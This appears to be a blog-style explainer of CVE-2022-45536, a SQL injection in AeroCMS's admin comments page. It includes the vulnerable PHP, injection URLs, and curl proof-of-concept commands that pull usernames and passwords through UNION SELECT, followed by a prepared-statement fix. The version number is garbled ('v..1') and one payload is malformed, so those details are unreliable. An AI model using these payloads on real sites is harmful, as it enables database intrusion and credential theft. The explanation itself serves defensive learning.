CVE-2022-45536 - AeroCMS v..1 SQL Injection Vulnerability Explained

CVE-2022-45536 is a serious security flaw found in AeroCMS version ..1. This vulnerability allows attackers to carry out a SQL Injection attack using the id parameter in the /admin/post_comments.php page. Let’s break down what this means, see how attackers can exploit it, and learn how you can protect your applications.

What Is SQL Injection?

SQL Injection is when an attacker tricks an application into running unexpected SQL commands by inserting crafted input into application fields. If not handled properly, this can let the attacker view or manipulate your database.

Where’s the Problem?

In AeroCMS v..1, the id parameter in /admin/post_comments.php is vulnerable. It doesn’t properly validate or sanitize user input before using it in a SQL query. The insecure code looks a bit like this:

<?php
// An example similar to what’s in AeroCMS
if(isset($_GET['id'])){
    $id = $_GET['id'];
    $query = "SELECT * FROM comments WHERE post_id = $id";
    $result = mysqli_query($conn, $query);
    // ... (rest of the code)
}
?>

Notice that the $id variable comes straight from the URL, and is put directly into the SQL command. That means a user can control the value of $id—and potentially inject malicious SQL code.

Let’s say the website’s admin goes to this URL

http://target-site/admin/post_comments.php?id=5

This would show comments for post 5. But an attacker could try

http://target-site/admin/post_comments.php?id=5%20OR%201=1

This changes the SQL command to

SELECT * FROM comments WHERE post_id = 5 OR 1=1

Because 1=1 is always true, this query returns every comment, not just those for post 5. But it gets worse—they could go further and try to read data from other tables.

Example exploit

http://target-site/admin/post_comments.php?id=-1%20UNION%20SELECT%201,username,password,4,5%20FROM%20users

This tries to “glue” the results of two queries, pulling the usernames and passwords from the users table.

Here’s a basic proof of concept using a tool like curl

curl "http://target-site/admin/post_comments.php?id=1'; OR '1'='1"

Or, to extract data

curl "http://target-site/admin/post_comments.php?id=-1 UNION SELECT 1,username,password,4,5 FROM users"

Depending on how the output is rendered, the attacker could see usernames and hashed passwords from the database.

Possibly manipulate or delete data

This can lead to data breaches and entire website compromise.

How to Fix

Always sanitize and validate user input. The safe way to handle this is by using prepared statements or parameterized queries. Here’s how you can fix the buggy PHP code:

<?php
if(isset($_GET['id'])){
    $id = $_GET['id'];
    // Use a prepared statement
    $stmt = $conn->prepare("SELECT * FROM comments WHERE post_id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $result = $stmt->get_result();
    // ... (rest of the code)
}
?>

This way, whatever the user puts in id will be treated as data—not executable SQL.

References

- NVD Entry for CVE-2022-45536
- Packet Storm Advisory
- Exploit Database (EDB-ID: 51063)

Conclusion

CVE-2022-45536 demonstrates why it’s crucial to never trust user input. If you are running AeroCMS version ..1, you should patch your site immediately. Use proper input validation and prepared statements to defend your applications. Never assume your parameters are safe—because attackers are always looking for shortcuts into your system.

Stay safe! If you have more questions on SQL injection or want help securing your site, feel free to ask.

Timeline

Published on: 11/22/2022 21:15:00 UTC
Last modified on: 11/23/2022 16:02:00 UTC